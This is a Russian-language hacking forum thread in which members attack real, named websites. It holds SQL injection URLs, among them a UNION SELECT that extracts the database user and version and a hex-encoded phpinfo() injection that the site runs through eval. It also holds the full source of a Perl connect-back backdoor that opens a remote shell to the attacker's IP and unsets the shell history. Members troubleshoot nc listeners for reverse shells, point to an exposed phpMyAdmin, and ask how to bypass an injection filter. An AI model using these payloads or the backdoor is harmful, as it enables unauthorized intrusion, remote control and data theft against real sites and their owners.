http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* О мне выдаёт следующее: Parse error: parse error, unexpected $ in /www/kinogild/www/htdocs/stalkerfest/page.php(44) : eval()'d code on line 1 Как это понимать? Растолкуйте кто нибудь пожалуйста!
Code: http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14-- вот как бы,если это в виду имел
Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято. Зачем знак комментария в конце? И без него то же самое отображает вроде
http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7,8,9,10,11,12,13,14/*
Не пойму почему не делается бек-коннект Делаю следующее... У себя в cmd прописал start nc -l -p 80 Залил перловый бэкдор Code: #!/usr/bin/perl use IO::Socket; #IRAN HACKERS SABOTAGE Connect Back Shell #code by:LorD #We Are :LorD-C0d3r-NT # #lord@SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host #bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 2121 #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(lord) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system = '/bin/sh'; $ARGC=@ARGV; print "--== Backdoor -=====- Hello Melkiy ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); system($system); #EOF С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80 И выдаёт: --== Backdoor -=====- Hello Melkiy ==-- [-] Unable to Connect Host В чём проблема? P.S Пробовал другие порты, тоже самое...
Code: C:\Documents and Settings\Администратор>ping ****.ru Обмен пакетами с ****.ru [**.**.**.53] по 32 байт: Ответ от **.**.**.**: Заданная сеть недоступна. Превышен интервал ожидания для запроса. Ответ от **.**.**.**: Заданная сеть недоступна. Превышен интервал ожидания для запроса. Статистика Ping для **.**.**.**: Пакетов: отправлено = 4, получено = 2, потеряно = 2 (50% потерь), Приблизительное время приема-передачи в мс: Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
Превышен интервал ожидания для запроса. Ответ от **.**.**.**: Заданная сеть недоступна. Подожди может
еще вопрос... когда выполняю комманду perl perl.pl [свой IP] 80 сервер тухнет! в чем проблема? [500] Internal Server Error и так на каждом шелле не хочет делать бэк-коннект на мой комп, хотя нет, попробовал с деда - тоже самое -- Это пиздец какой-то =( ни один сервер не может подключится... Code: --== Backdoor -=====- Hello Melkiy ==-- [-] Unable to Connect Host в чём проблема-то? //Разобрался
Code: http://infosfera.sfo.ru/phpmyadmin/ не админка, но может оказаться и полезней PS: Админку что-то своими средствами не нашел, правда искал минут 5. Бежать надо.
Доброго времени. Нашел вроде SQL-inj: http://site.net/index.php?id=777' - выдает пустую страницу http://site.net/index.php?id=777+order+by+1/* - отображает корректоно http://site.net/index.php?id=777+order+by+10/*-снова пусто Подобрал, 3 столбца. Набираю: http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla). Похоже на фильтрацию. Какие варианты есть чтобы обойти? P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все